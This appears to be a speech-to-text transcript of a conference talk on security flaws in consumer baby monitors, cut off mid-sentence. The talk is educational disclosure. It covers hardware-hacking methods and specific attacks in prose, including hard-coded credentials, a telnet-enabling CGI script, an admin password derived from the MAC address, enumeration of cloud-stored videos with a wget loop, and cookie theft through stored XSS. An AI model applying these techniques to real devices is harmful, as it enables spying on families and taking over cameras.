 All right. All right, well, good afternoon. Thanks for not being so drunk. You can still watch my talk or fall asleep in the front row either. It's fine. So this talk is a couple things. So kind of the front of this talk is going to be about research focused on internet-connected baby monitors. So I did a large research study on nine devices just about six or eight months ago. The latter part of the talk is about two newer pieces of research I did that I released in February. One is on a Connected Children's smartwatch, if you will. And the other one is a Connected Smart Toy. So we'll kind of have a little bit of a break in there in terms of content. But that's kind of the flow for today. IoT is a really fun place to play for secure research right now. There's nothing like there's no limit on a tax surface. There's nothing but crazy dependency chains and outdated libraries and poor web apps like we've been dealing with forever and ever Buffer Overflow, everything you could imagine, every research project you've done, IoT can encompass all of those just with one product. And that's why it's a lot of fun. There's a lot to go after, a lot to look at. IoT vendors in general, it's a really hard thing. We like to pick on vendors. But at the same time, these vendors very often, they have a really good idea. They want to go to market and they say, well, how do we do that? And so they go to ODM manufacturer, whomever in Taiwan, they get a chipset, SOC, they get some firmware, and they pop it, a web server on it and go, OK, that's the start. And then they go, well, now we need to encode video or we need to transmit files. We need to host things in the cloud somewhere. And so now they have vendor one, vendor two, vendor three, vendor four, and vendor one through four all have APIs and their own credential thing and their own terrible crossite script and everywhere, web apps and SQLI everywhere. So it's a really hard thing because you're picking a supply chain. And the more of these things that you have to build into your ecosystem for this device, the more avenues an attacker will have to go after. So it's a very hard thing to do well. We see at companies big and small. It's a daunting task to hire a really well-balanced security team. So if you think of IoT and just kind of a short list, most IoT devices you'll see will have some sort of mobile app. There's going to be cloud services. There might be an API, web apps for sure, the hardware, the firmware, all the network protocols, all the wireless protocols, and then all the crypto within each of those pieces. It's hard enough for big companies with lots of money and resources to do security well, especially when you have this many things to secure. But a lot of the IoT vendors you're buying devices from are actually really small companies. Even when they're big names, very often it's actually really small subsidiaries or pieces of that umbrella that they're working within that have no security team, no security engineering experience, no crypto experience, no web app security experience. So it's a really hard thing for companies to do very well. And the other thing that's happening right now, we're seeing a lot of just growth, maturity in IoT. So there's a lot of frameworks that are proposed right now. There are a lot of standards being proposed, a lot of working groups, a lot of very large companies putting a lot of money into a problem that they don't really know what they are trying to solve yet. And it's a tough time. And for companies coming into the IoT market, there's not a lot of guidance there to help them. They kind of just have to piecemeal security like most companies already do, into their products and hope for the best. The kind of like quick part here I want to go over, I like security talks that actually talk about how security research works. So if you're looking to get into IoT hacking or just hardware hacking and some of these other pieces, hopefully this is a quick little primer for you that you might find a tip or two and might find this interesting. So one thing of course, when it comes to embedded hardware is you want firmware. Firmware unlocks all kinds of secrets. People love to hide crypto keys. They love to hide hard-coded passwords. There's all kinds of interesting stuff as well as obviously attacking software. So if you have a dynamic analysis environment for a binary, like that's actually the host environment, it's a much easier thing than doing everything kind of in a bubble and hoping things will work in real life. And so a lot of different ways to get firmware. One of the easiest ways when it's possible is many devices have these small, outlawed integrated circuits or SOIC or whatever you want to call them. They're little flash memory packages effectively. With a $10 Pomona clip, just a test clip, couple jumper wires, and then something like a bus pirate or a Shikra or a Raspberry Pi that has anything that can speak spy, so this SPI, that's actually communication protocol that you can actually bit for bit dump firmware. You don't have to desolder. You don't have to rip ships off and break the device. You just put it on, run Flash ROM, which is an open source tool that has huge, huge support for many different package types and configurations of memory. And it just pulls all the firmware data off. It's fantastic, right? So if you're looking to get into this, very low barrier to entry just to start getting some information off these devices, there's other ways. We'll talk about some of these just incidentally, but you can manage the middle firmware during the update. You can go to, sometimes the vendor actually provides firmware less and less these days. A lot of different ways. Once you have the firmware, kind of the tried and true method is just running something like BinWalk. And BinWalk will actually go through this image and it'll basically carve out the pieces that are file systems. It'll carve out the pieces that are kernels and all these other components of this image that you might have dumped. And then from there, you can mount file systems, walk through the actual file system, look for binaries, look for password files, whatever you're looking to attack. So a lot of good value, very cheap, easy to do. BruteForce, so once you might maybe get a shadow file, you should probably try to crack the passwords in the shadow file. That seems pretty straightforward. So hash cat or anything else that can do BruteForce attacks against a password file of any sorts, great. The other thing though, and kind of, a little bit of a stretch for BruteForce, but many of these devices have web APIs and very often they're documented in the mobile apps. If you're watching traffic over the network, you might see some DNS requests fly over and go, oh, that's a weird host name. And if you start Google dorking around and looking up certain host names, you can very often find data. And so this little screenshot is real data of a user, some user, and all of the JSON output of the records of their account that got indexed by Google. And this is API for one of the larger kind of IoT, we things they have like scales and baby monitors and all kinds of other internet connected devices. So kind of one of the bigger brands out there. UART, so you'll see a JTAG layer and some of you might be like, this is sacrilege to use JTAG layer for UART, but UART it's actually supported in JTAG layer. You can enumerate UART. And so UART effectively is serial consoles, right? That's what it comes down to. So plug a couple of wires in very often even their silk screen labeled TXRX. I mean, it's not hard to find usually, but once you have a UART, you might get a prompt like in the middle there to actually log in. So maybe you don't have credentials yet. Maybe you do, you can log in and whatever or try to brute force them and log in that way. The other thing that happens very often is you'll see something like UBoot, which is the boot loader that you'll see very often in embedded hardware. And UBoot will let you drop to configuration parameters for UBoot and you can do things like append kernel parameters for the boot sequence and just do like init equals bin ash or something, right? Whatever shell you have or just do single user mode, throw single or one at the end and concatenate that kernel argument. And now you're logged in to this environment and you can change the password and just log in yourself whenever you want. So a lot of different ways, but once you have UART, it gives you that visibility that embedded device, right? Like they're black boxes. And UART's a really quick way to have an interface to actually work in a shell directly on that platform. JTAG proper JTAG. So JTAGler, again, so JTAGler basically can enumerate pins. There's a bunch of pins in a JTAG configuration and the hard part is knowing like, which pin is this, which pin is that and JTAGler will help enumerate the combinations and actually save you a lot of time from like jump or wire move, jump or wire move, config, config, whatever. And so you can use things like I have a J-Link, really cheap device, very effective. Any device or any device that can interface with something like OpenOCD, that can actually talk over these protocols for certain boards that you have pre-configured in there is really easy. And the cool thing about JTAG is it's very, very low. I mean, it's made for testing, right? So it's low level and so you can do things like dump the live memory of that actual running thing just over GDB and start interrogating. You can also do things like edit memory. So let's say you, and this actually does happen, sometimes there will be configurations to the bootloader that will prevent you from doing single user mode or something else, right? And so you are like, well, I can't do single user mode. They've like kind of like hot patched that so I can't bypass it that way. You can actually halt execution of this live thing via JTAG, change the bytes of memory, append in memory the single user mode and then resume execution and you'll actually bypass that bypass prevention. I don't know whatever you wanna call it. So when it's available, it's not always easily available. Sometimes it's actually very annoying whether it's the pads or the pinout or whatever to actually interface with JTAG on device. Once you actually do have access, it's basically as low level as you could ever wanna go effectively and there's a lot of cool tricks you can do just by having that access. Mobile applications, especially for consumer IoT. Mobile applications, we've seen terrible, terrible mobile applications for many years and IoT is like the best of the terrible. Hardcoded everything, backdoor passwords, static strings for different tokens that should be like doing API calls. It's amazing what's inside though. So like in the top example, you can find a link to firmware. So that's handy, you can just download the firmware yourself and not have to like dump it. You see a lot of clear text stuff over, of course API calls for different mobile apps or backend services. And especially when it comes to something like Android. Android is concerningly simple for the most part. If you throw an APK, dex to jar, you get basically pretty good Java back, enough of quality of Java in most cases to start understanding like how the software is working, look at some of the methods that are involved and we'll see a few examples of that later. Wireshark and Map, like general network tools, all of this stuff has some sort of internet connectivity or at least local LAN connectivity. So looking for things like, are they doing like weird multicast DNS things? Are they doing UPnP? What kind of tax service do we have there? As well as just watching network traffic and seeing what's flowing over. Many of the vendors, luckily less so now, but many of the vendors up until very, very recently almost had no crypto stacks in anything. A lot of the chipsets they were using were very underpowered because they were very cheap and very old. And if they did support crypto, a lot of the developers just didn't care because it's out of sight, out of mind. A lot of developers think, well you're using a mobile app, you don't see there's not HTTPS, so we're just gonna skip over that, don't worry about that. And that's unfortunately how it happens. And the web apps, so you have web apps in the cloud, so that's cross-site scripting on a login page for one of the camera platforms. And then you have, many of these devices actually have backend web applications. And so your mobile app might be communicating, right? And sending some data somewhere and doing some requests. Very often these are like full web apps that they're just using as like a really bloated API. So they've basically taken an entire web app, thrown it on a web server, just to do like basic like get and post stuff. So there's huge amount of tax service, huge amount of interaction, but really not for any purpose. And what keeps happening is a lot of these vendors go to the same chip manufacturer or the same video encoding chip manufacturer, whatever, and they give, oh, here's a sample app we built. And then they just copy and paste that and we kind of see where we get with that. So a little bit of an overview, that's a handful of the techniques you can use. Obviously each device is a little bit different, the kinds of things, if it's Bluetooth, if there's Wi-Fi you can do many other attacks. So here's a breakdown of the devices just for kind of an overview. And so doing this research, I wanted to look at more of like almost like a case study approach. So a lot of vendors look at a number of price points, so really cheap to really, pretty expensive, right? This is all US dollars for what it's worth, where they sit on Amazon. So how popular are they on Amazon and just the features themselves? And so as we go through this, one of the questions that reasonably I ask myself, and a lot of people ask me since, is can you buy security? Are you buying better security with these devices? The answer is no, very plainly the answer is no. We'll see very detailed why soon. So this section will basically bounce through, some things are just funny. I wouldn't necessarily consider them a vulnerability, I just find them funny or weird or bad as you reverse engineer things, you find things that you think are just kind of comical. One thing that I think for like design pattern sake, is when you have a black box in your home somewhere, for most consumers your only interaction with that is either probably a web app or it's a mobile app. You don't know what that device is doing. Your phone or your browser is saying, oh, I'm currently configured like this, I'm doing this, I have this feature on or off. And with this first babe monitor for the we things one, I was watching traffic, RTMP dumps pretty simple for just taking RTMP traffic and basically saving that file down. And so watching the stream, I shut off the feature of like basically babe mirrors disabled, right? And I checked it at five minutes, it's still streaming 10 minutes, 15 minutes, 20 minutes and at 20 minutes, I just gave up. I'm like, well, why ever you would turn it off at that point, the app is lying to you, the stream is live, it's not like cached, it's literally just still live streaming your entire video and audio of that camera. And so that's a really important thing, especially if you do software engineering, right? Like we often test cases that don't quite hit the mark on where that bridge between privacy and security kind of overlap. And so this is a thing where as a researcher I'm looking for security issues, but I'm finding really what's amounting to a privacy issue. The vendor is telling me this is not streaming, but it actually is. Here's a weird piece of code, one of many weird pieces of code you will always find, especially reversing bad mobile apps. And so this was just a method. And so when you're looking for basic reversing stuff, you're looking for interesting methods, you're looking for the things that might contain something cool or important. So I found MD5 root session as a method name. That's like a great combination of terrible things you don't wanna see in code. And it does this weird concatenation. And I'm like, well, what the hell's that? And I see an email address. And I'm like, oh God, and I see MD5 with the email. I'm like, oh no. And finally there's this M-Chunk method. And the tool I didn't read on this is the M-Chunk method is effectively this weird obfuscation routine to take an integer, go through this loop, and then output some data to basically concatenate to this very secure token. At some point, if you're paying attention, you'll notice that the for loop starts and it immediately hits return. So all of that stuff below does nothing. And again, why did this happen? Did the developer do it like they're like, oh, this seems like a great idea. And some other developers like this is a dumb idea and they just gave up. Or were they debugging it because it broke something and they just never turned it back on? Whatever. The reality is, whether it had been enabled or not, like you can take that method out, put it into Java file, Java CC, and just run it, right? Like you would get the data back. So it's more of one of those things that if you're not looking at the source code, maybe it's obfuscated enough if you're doing some other attack against it or looking at the wire or whatever else. But just weird things you'll see. Wi-Fi, baby. So this is a $260 camera. Very, very expensive, very ugly, but very expensive. 2015 model, it literally has 2015 model in the name. And I get it out of the box and I start looking at all the stuff. And I'm not like, I don't naturally like run vulnerability scanners because I don't find a lot of value in them. And so, it's kind of like looking, diving in stuff. And then finally, I started looking and I was like, oh, you know, U-P-M-P stuff and what's in there. And I start scanning a couple of things and notice that, oh, this 2015 camera that costs $260 US has two 2012 remote code execution bugs just built in. I'm like, oh, my firmware must be super out of date. There's no firmware update at all. Like there's nowhere on the site to get firmware. There's no method built in to let me install firmware as a native user of the platform. So, extremely expensive camera, one of the better-known brands, in fact, and it comes with two like CVSS 10 bugs. That's pretty handy. So, and this just shows you like, again, you cannot buy security. This is literally the highest price camera I looked at. On the lowest end camera, and this looks even worse, as you can tell by just everything about this photo, a terrible camera, it's only sold on Amazon. There's no company behind this camera. In fact, when we were disclosing vulnerabilities, and one thing I should mention is, you know, I'm trying to do, like, this talk is more like a survey course. Like, I'm not gonna go over the same bugs for every single camera, because we'd be here all night. There are bugs I didn't even bother submitting, because I was just too tired of submitting bugs to people. So, this is an example where this camera is just terrible, cheap, whatever. One cool thing, though, as a feature, they basically give you an FTP account for every camera with an unlimited quota that I could test for. So, if you're looking for, like, that new wears host or something else, just, you know, get your FTP credentials for free and use it for your cloud storage, or whatever. All kinds of useful things. One subtle distinction that really gets, it's one of those annoying InfoSec things, right? People use hard-coded credentials and default credentials, like, interchangeably, which is not the case. Point up here, so Admin, Admin, this is like a web configuration file for the camera's backend service, like all these things have. Admin, Admin is a default credential. When you buy the camera, set the camera up, I can change Admin, Admin, okay? Default credential, it's still terrible default. I agree, but it's default. I can change it. Unfortunately, user, user, and guess, guess are hard-coded. The user of this camera has no knowledge they exist. There is no way to change them. There is nothing that would tell them they're there. But they're there and you can just go to, of course, the unencrypted URL and stream the camera live with user, user, or guess, guess, no problem. And then it had this weird, like, Linux file system where Admin was effectively root because they just like schmod like 777, you know, as you do, it has like a terrible hard-coded root password that's on every camera, so that's that one. Quick, just overview. If you wanna think about how, like, little cryptos used, four different interfaces for one camera, none of which used crypto, zero crypto, streaming, account registration, basic configuration, everything just skips crypto altogether. Trend Micro, I don't think they fixed it. I just redacted it, I forgot to even undredact it. It's like the login page if you wanna do that. But again, an example where we have all these cameras, Trend Micro, or Trend Net, sorry, not Trend Micro, my bad. Trend Net has had a history, like the Federal Trade Commission in the States came down on them pretty hard a number of years ago for this line of cameras that had this firmware that basically you went to like a CGI, you know, Earl, and it was like, oh, here's your camera. And then people made like Twitter accounts to index them and put them on the internet of everyone's camera, and it was this big to do. So looking at their camera, I was a little bit interested in how much their security program's matured, login page cross-site scripting, not exactly a great indicator, but it's too bad. And then default creds, root admin, there's a lot of, trust me, there are a lot of root, root, root admins via Telnet, via SSH by default. These services very often are listening by defaults. In the case of this, they actually, one of the firmware updates I got while I was testing, they actually turned off Telnet, which is good, right? But as developers, as engineers, if you're working with design teams, you know, always take stuff out you don't need, right? It may be like, it may just kind of be obfuscation, right, like a good attacker can usually get stuff back on, depending on the file system and some other things, but certainly leaving these things behind is a bad idea, and we'll talk about why that is in just a minute. So iBaby M3S, one of two iBaby cameras, iBaby is like the number one brand for internet connectivity monitors, they have brand new, I actually get emails still, like I got put on some mailing list somehow, from contacting them, I think, to like disclose, that they actually put me on like the new product mailing list. I'm like, that probably take me off that list, it's probably not gonna help you. So this is, again, a pretty expensive camera, very well known brand, and scan it with Nmap, okay, it's got Telnet, I dumped the file system, so I already knew, hey, the username is logged, and username and passwords, admin, admin, so this is Telnet by default, current firmware, very expensive camera, username, admin, password admin, and then the red herring, right, or not the red herring, like the red flag, I guess. So the red flag here is, if you're a UNIX personal, or crypto person, whatever, I'll give you a hint, that when you, even ignore like the unnamed dash A there, just look at the password file, if you see the, first off, if you see a password hash, if you will, in a password file, and it's not like 1994, there's a problem, because there should be a shadow file, not a password file anymore, but when you see a hash of that small of size, it doesn't have like the dollar sign, dollar sign, one or three or whatever, to designate like what algorithms used, it's gonna be UNIX crypt or desk crypt, right, and interchangeable terms basically, and so that's a red flag that everything else on this thing is super probably old, very old, so this is a 2014, 2015 camera roughly, so UBoot, which is the boot loader again from 2005, OpenSSL 2007, 0980 is actually too old for Heartbleed, so they got, they got a security benefit from being super outdated, a Linux kernel from 2007, which like the number of local root exploits on that is just like, there's probably an integer overflow because of the number of like local root exploits, and then busybox, which is kind of like all the base level tools in a lot of embedded systems, and then UNIX crypt, and of course it's running Talonet, so we're, and again, this is a really big brand, a really big vendor, and you know, like a $150 camera or $106 camera, it's, they did have some encryption, and they had encryption, and they put it of course in their mobile app, and you know, if you wanna talk about ECB mode, that's one whole crypto joke later, but the important part here is they hard code a really crappy passphrase, and that passphrase is the way that you encrypt and decrypt every backup, so if you ever happen to like GoogleDor can find these backups published online or you're attacking a network and doing your thing, you can just decrypt it that way and just pull it out of the mobile app altogether. Oh, and then XXT, how many crypt, like how many, how many people can sort of them like themselves crypto people? Okay, how many of you have done anything with XXT before? You really get crypto people then clearly. Where are we working with XXT? Just for funsies or? Yeah, okay, fair enough, and am I correct in saying, because I've been saying this because I think it's a fair statement, is the complexity of the algorithm so low that on low powered hardware that might be a reason why they would use XXT? Okay, and so, you know, again, I think I've looked at a lot of devices in my life, I've never, and mobile apps too, I've never seen anyone actually use XXT, but hey, was Xbox using XXT or was that? Yeah, okay, I think the original Xbox for the code signing or like somewhere in there that they had that, but, so here's the other iBaby, so this is the more expensive one, the newer one, and you're like, oh, newer, fancy or whatever. Still telling that by default, admin, admin login, all the API calls for the mobile app are all unencrypted over the internet, logins and all that stuff, but we're starting to like segue into like just bad things that are gonna happen to your children part now. And so, as part of like looking this stuff up, there was this old website, iBabyCloud, it wasn't really document anywhere, like I just happened to like kind of look it up when I saw the API calls and tried to log in, and there's like a login prompt, and again, this is not something they talk about readily, they want you to use the mobile app, this like just happens to be there. So when I started hacking on this stuff, that didn't happen, that right image did not happen. So at some point in time, it was not my fault, I guarantee you, at some point in time, like someone deleted like a library on the server or something, and all of a sudden, everything died with this application because it can do like a hashing algorithm to log you in, whatever. Before that happened though, we had this situation where, you know, as you do, I made multiple accounts, so I know it's hard to see up on the screen, the first one that says proper account is mark.stanislav at gmail.com, the second one is mark.stanislav, no dot, right? So for my email account, same exact email address, right? But for accounts inside of databases for websites, completely different account. And this is, you know, it's like adding a plus or something else to your email for testing. And so proper account, login, it's got some, you know, URL with like a Mac address or something, I didn't really look too hard at it. And the first thing you do, oh, I guess it's like the cam idea, I guess it's up there, huh? And so the first thing you always do is like, you have your multiple testing accounts and you start copying and pasting shit, right? Like you're like, does this do this here? Does this do this here? Can I like take a privilege here that should be for this person, not this person? And sure enough, I just copy and paste from one account to the other and I'm looking at the camera details for someone else's account, right? So direct object reference, like base, like the simplest thing in the world, right? Copying URL is very tough. And so, you know, if the first screen's out, you're like camera ID, Mac address, firmware, there's like the P2P UID, which could be interesting for some sort of attack, but it's not really like direct scary stuff necessarily. Then I went to this page and it had this alert information. So like, most of these cameras that have a cloud service behind them, especially. One of the main features that you will buy them for, especially at like the higher price points because they have the service built in, is this idea that if there's a like a loud sound in the baby's room, or if there's a motion in the baby's room, it'll take like a 30 second clip. So it'll like cache a few seconds and show you like what happened just before the sound, up to the sound, a little bit after the sound, record that, put it online, and then like your mobile phone might get a, you know, get a notification, say, hey, there was a sound, you should check that out, like, is your baby okay, whatever. So this is an example where I log in here, I get here, and the images, the preview are broken. I'm like, oh, maybe this is like a really old site and this is all broken and doesn't work. Well, if you highlight over the picture, there's, you know, a link there, you look at the HTML and there's a link there. And having looked at the mobile traffic and looked at how the mobile traffic worked, I realized what they had done is they have, like, which is completely fine, they have Amazon on the back end for video uploads, they have S3 buckets, they have CloudFront for the CDN part, and if you are on one of these pages for any camera, you effectively can enumerate all the videos in the HTML, they have one bucket for all videos, for all customers, they do not upload, they do not encrypt data before it's uploaded, and in fact, when you stream video, they don't authenticate you, they don't do over HTTPS, they don't do anything crypto because that's all built in and free with S3, literally, but they just don't use it for some reason. And if you take, let me go back here a slide, if you look at the URL up there and you see the CAM ID, right, you know, kind of a simple thing to enumerate, you know, start with some number that you have like this camera ID and work backwards and forwards within like a certain key space, and you can very quickly just get a 200 response or not get a 200 response and probably figure out like what cameras are what cameras, and we're on a way. Once you have that, you literally just append the camera ID in that URL for CloudFront, because there's actually directories, which is super helpful for us, and then you have the AVI file name for the videos on the alert page, and you iterate, find all the cameras, you iterate, find all the videos, and what you've done is you've downloaded every single alert video for every single camera for every single user, very quickly, right? It's a very, very simple process, you know, one bash, you know, for loop and W getting you pretty much on your way. So this is a great example of where IoT starts becoming a big problem, because everything that fails in IoT is almost always a scale failure. It's not a, oh, I popped one device, I got one shell, I got one X or one Y. You've stolen every video on every camera in like one shot, right, effectively. And so this is another thing where they could have used individual IAM credentials for every account, and that would have prevented this. They could have, of course, fixed the web bug, that would have helped too. You know, they could sign request URLs and do all that, they don't do any of that, and again, it's all free in AWS, they're just not doing any of it. So we stole all the videos from all the people, that's not great. The other thing I think, you know, to think about like, again, design patterns, because, you know, I've developed software too, and I think about these things with notifications, like a lot of people turn notifications off on their apps, a lot of people have like inbox 20,000 on their mail, and they don't care. So if you think about the parents who, so I have a four month baby, I'm not worried about like, what the hell my app's yelling at me about, I'm like changing the diaper or something. And so the, you know, the reality is, we ignore these alerts all the time, and so you might have hundreds, thousands of videos on your, in the cloud, just don't delete them, because you don't care, it doesn't really matter to you. And then if I go in, I now download all those videos, because you don't care about them. And you never realize, maybe even that they were enabled, because by default, these cameras do this by default. It's not a feature you even have to enable. So kind of crazy. Back in 2013, I did some research on this eyes-on camera. Did anyone have this camera by chance back? Few years? Okay. So I did this research, and you know, a lot of problems, you know, cameras are always like a great, just terrible time. And so when I started researching this Philips device, I was like, oh, I, like, UNIX, I know this, right? Like, Jurassic Park. So I was like, this looks familiar. I can deal with this. And so my question really wasn't, how do I own this thing? Because I had owned it before. The question is, are the same things that I found that were wrong, still wrong multiple years later, different vendor, did the upstream provider of the firmware actually fix their stuff, as well as the app stack things that were kind of unique to this particular chip set and some other stuff? So the answer is no. It still does no SSL anywhere, and this is all default app stack stuff too. This is all built into the mobile eyes platform that these two cameras both share. The same three UNIX accounts that were hard coded in that camera are still hard coded in this camera. The firmware upgrade process is still insecure. One of the things I like to point out, because sometimes people like glaze over this and go like, oh, it's secure. So all the firmware update process is over HTTP. So it's clear text, so you can manipulate it, no problem, whatever. And then you'll see there's an image file, which is the firmware in MD5 sum. And I was like, oh, MD5 sum, they're checking the integrity. Yes, but they're checking the integrity of something that's going over HTTP. I can manage the middle of both things. I can manage the middle of the firmware, give you a different firmware, and I can do my own MD5 sum and put that into the other file and you get both. It's not signed. That's the question that you're probably asking. No, it is not signed. There's no crypto signature of that MD5 sum to actually validate in any PKI anywhere that this is valid. So a completely insecure upgrade process. Telnet was enabled by default until recently, at least recently when I made this slide deck originally. But as we talked about earlier, if you're not using something, you should probably ditch it and not just leave it there. And here's why. We'll start with the top right. So the top right, there was literally a script in there, in this camera, that if you went to that script, cam underscore service underscore enable.cgi, it's literally just like shebang, like bin sh, telnet d ampersand. It just starts telnet again. So telnet's off by default. You go to one URL and it turns telnet on again. And the hardcoder credentials root, the camera model itself is b120. So of course the password is b120 root. Very simple, very useful. And so you log in, you have root on this camera, you were enabled telnet via one HTTP call. So you might be saying, well, you know, that HTTP call to actually run that CGI script probably has some sort of authentication. And you're totally right, it does. But when we're reversing the mobile app, we see getMD5 hash. And that getMD5 hash is how they create the admin password for this web app. And it takes your MAC address, which is the param that you will see going into that method, takes the MAC address, truncates it and then appends like an eye. So if you can find the MAC address, which if you're on the network with someone, you can find the MAC address, I'm very sure. You can make the admin password for that camera in like one step on the command line. So now you can turn, so from just being co-tenant on like a LAN, you can find out what the camera is because we know what MAC identifiers look like. Find out what the camera is, generate the admin password, run that script, log in his root. You know, now you've got your pivot point or whatever else you're trying to do on that network. The one at the bottom is another scale thing. So cross-site scripting for me is the thing like I don't even almost report to people. I just, again, we would spend all of our lives reporting cross-site scripting if that was what we wanted to do. And so I, as this process went on, this service called Weaved came up. And Weaved is effectively like the middleware provider that actually initiates the streaming connections for this camera over the internet. So when you wanna use your phone to check on your home remotely, they actually used Weaved to do the middle part. So there's a service that you're not supposed to know about but of course it's easy to like log in with credentials when you know them. And you find these API calls and whatever. So I logged in and I found there's a whole like web backend for this thing and not really featureful, just some basic information. And I found like multiple types of cross-site scripting. I'm like, okay, whatever, I'll like shelve it, maybe I'll report it later, whatever. What I didn't realize at the time, and I went back and was doing some like rechecking on findings, one of them was actually stored cross-site scripting, which is a little bit more interesting than reflective. But the next thing I figured out is one of the stored cross-site scripting was in the basic device identifier. Now, the other thing you have to know about this is that the cookie, the session cookie, is not HTTP only. So we've got stored cross-site scripting, no HTTP only on the cookie. So we're effectively able to session hijacking, stored session hijacking for whoever looks at a page with that data, right? Pretty straightforward. The good news is, well, bad news for them, but great news for me is when you think about, if you've developed like web apps, for instance, the same interfaces, it's just like a privilege thing, right? Like you log in, the code on the backend is probably the same, the view, the controller, like do different things based on if you're an admin or not an admin, right? Now, if you've ever dealt with any sort of backend administrative pages, if I have customers, I have an admin interface for my customers, right? And I'm probably going to be listing devices that the customer owns in there so I can help them if they have a problem. So what we're talking about is not owning my camera, we're not talking about owning the Philips cameras, we're not talking about whatever. Weaved is actually a multi-vendor IoT platform. They have many, many, many customers that all use them. And if we have stored cross-site scripting, no HTTP only, and we can influence the admin page when they log in, now we're stealing admin cookies to the entire IoT platform and not just to one device or one vendor. So scale, right? IoT and scale. So here's a brief thing that we need to just give a high-level overview, so pretty simple. So of course none of us, all of this is clear text, none of this is encrypted. So one thing that happens and I hear about a lot is, oh, I use Showdan, I find all the things with Showdan. The reality is, Showdan doesn't really work like that in the modern IoT era. A lot of these things are reverse proxy, a lot of these things do weird network traversal things that you don't just have a port on a network listing on the internet. In this case, you kind of have that, but it's on demand and it's actually ephemeral. So it's a very short time span, and it's only based on when you, the user of that device, wants to see the camera. Otherwise, your camera's not on the internet, it's just local. So what happens is your camera's behind your home network, your phone's somewhere else, you've got the internet, which is great, that's a helpful part of this whole equation, and you say, I wanna see my camera at home. It connects the middleware provider, your camera is making an outbound TCP, like long living TCP connection, of course, to the middleware provider, and then they basically just make you to talk, right? And how they do this is they take one of their proxy hosts, they take a high number port, and they put your entire camera's web server on the public internet, on a public host name and on a public port. That is how this works. It gets worse though, because we have this knowledge that we can scan the internet very fast, and there's a lot of cool ways to do this, and David Adrian, who's a really smart guy, if you haven't seen like every crypto paper at U of M lately, he's done most of them, or helped with most of them, I should say, a lot of other great people. But this is an example where we might be able to find a camera on the internet, and that's great, but if you think of the attacks we had earlier, the admin password, we have to know the MAC address to create the admin password, okay? That can pose a bit of a problem over the internet, right? Like how TCP and stuff works, right? So we have some issues there. The good news is though, as soon as your camera is proxied onto the public internet, it does so and removes all authentication necessary. It's on the public internet, fully unauthenticated, direct access to every single script on that webcam server. So that means that I can put this in a Skype channel with a couple buddies, and they can click a link over the internet and start telnet D on my camera inside of my house. Or they can change passwords on it, or they can stream the camera over the internet, like opening up VLC, going to that URL, and just watching video and audio live, unauthenticated over the internet, done. If I didn't mention, a lot of these vulnerabilities are really boring, and that's because IoT sucks. So I apologize, but it's not my fault these suck. So we aren't quite to the point where when you consider all these web vulnerabilities that we've been trying to fix forever, right? Like we know how to stop cross-site scripting, we know how to stop SQLI, you know, IoT vendors in many cases, and I actually work with a lot of IoT vendors, right? Like for work, for other things we'll talk about in a second. The problem is a lot of these people are great product people that have an awesome idea. They've just never built anything on the internet, and they outsource to random guy here for like as cheap as possible. They outsource to this girl over here for as cheap as possible. And all of a sudden they have huge dependency chains, out-of-date software, terrible mobile apps, terrible web apps, terrible APIs, and then you tell them, hey, your thing's broken and your baby's ugly, which is funny because it's Baymoners, and they go, what do you mean? I paid all this money to all these people. And I'm like, yeah, but you didn't have anyone test this and actually validate the people you had doing your work are actually good at their job. Like, sorry, like these things happen. So, and it's unfortunate and luckily we can help a lot of them learn. In fact, not anything in this research, a different research project a few years ago, when I finally talked to the vendor after they stopped threatening to have me prosecuted, we had a nice conversation, and they fired their entire development staff. Everyone got fired, and they hired a brand new team. I had a call with them the first day everyone started. We went over like basics of security if they weren't already aware. And you know, it was all pro bono. Like, I want these companies to be successful, and there's just a lot of places to attack right now, unfortunately for them. So, Summer, a huge baby brand, definitely one of the bigger names just in general, not just for cameras. So they have this camera, expensive as well. Here's another, you know, soapbox design pattern thingy. So, email passwords, we all know email passwords are not a great idea. I'm not gonna talk about email passwords, that's not interesting. Maybe this other part isn't either, I don't know. But the other thing I found interesting about this is they make your password, your last name, truncated to eight characters, and then basically like your unique group identifier. So it's basically your account identifier for all purposes. And I thought, okay, well it's kind of interesting because the group identifier is clearly an integer, and it's got a range of space to it. You know, it's higher and lower as we go on in time. And so you have a serial integer, and basically a fixed parameter if you know who you're targeting, or you can figure out who you're targeting. And so if you think of the number of people out there who honestly would get this email and be like, that looks like a really secure password based on everything I know about passwords. It's got a capital letter, it's long, it's got this random number at the end, I'm gonna keep that, that looks like a great password, right? And again, this is just your average person, this is not this audience per se, right? This is just your average person buying a baby monitor. They don't care, they're like great, write it down, put it on post, no, monitor, whatever. And so we have a situation where this is a terrible design pattern, and I'll tell you why it's even worse in one second. Because that number is a serial integer, that number is your account ID. And in terms of all the bad things, you know, we can seal every video for every alert from the one camera. We can, you know, own like video traffic and do crazy like CGI script execution for cameras kind of ad hoc in another state. In this one, they have a web service, they have the ability to add privileged accounts, and with one URL, completely unauthenticated, with only knowing a serial integer, we can add ourselves as an admin to someone's camera. So again, bash, you know, for I in one dot, whatever, you run that and you literally can add your account as an admin to every single person's camera that's online with this company. And you can take those credentials because they actually are nice enough to email you a password at that point. You can take that, the email that you put in the password they sent you and you can just download the mobile app, log in as admin, start video, stop video, move the camera around, whatever you wanna do. One API call, well, I'm not really API call, right? Like one HTTP request, unauthenticated, serial integer for account ID, every camera from that company, done. So these are all problems, I think we can agree. So we had, at Rapid7, we have a pretty good disclosure program, so we do 60 days for everything just by rote and you know, July 4th, because no one checks their email on July 4th in the US, sorry for all those companies, but eventually like July 6th, they finally probably checked their email and realized all these bad things happened. We also work with cert every time just because cert can help make things go easier because government and they scare people into doing the right thing. And so a little bit of a scorecard, if you will. Again, because this is more like a case study, I wanted to see like how the industry or how the market space of babe miners actually looked, beer break. And looking upon that, again, there's no perfect way to do metrics for security, I hate to tell anyone in here that tries to do that for a living. There's a lot of good ideas and there's a lot of fuzzy math, but so all I wanna do is have a little bit apples not even good apples to apples, just apples to apples. So I picked some things like are all the local API calls encrypted? Are all the cloud API calls encrypted? Do they have like telnet or SSH on my defaults? And all these other things, right? So some basic stuff. I made this terrible scoring methodology that you will all disagree with. I disagree with it most days as well. But again, I just wanted to have a sense of how many hits and misses and just put like a quantify, you know, quantified a little bit. So here's where we ended up. Taking that scale, doing percentage base, your standard like grade and scale stuff. We got a very upset baby who is very, you know, loathing the entire baby monitor market. We have one D and the rest are Fs. The D is like just over the wire, right? To get a D which is not a thing to be proud of anyways. There was actually a zero from the $200 camera from iBaby and zero is never a good thing for security so that's bad. So that's the baby monitor research. Again, a lot of other bugs, a lot of other default passwords. We don't have time. The good news is from working with those vendors a 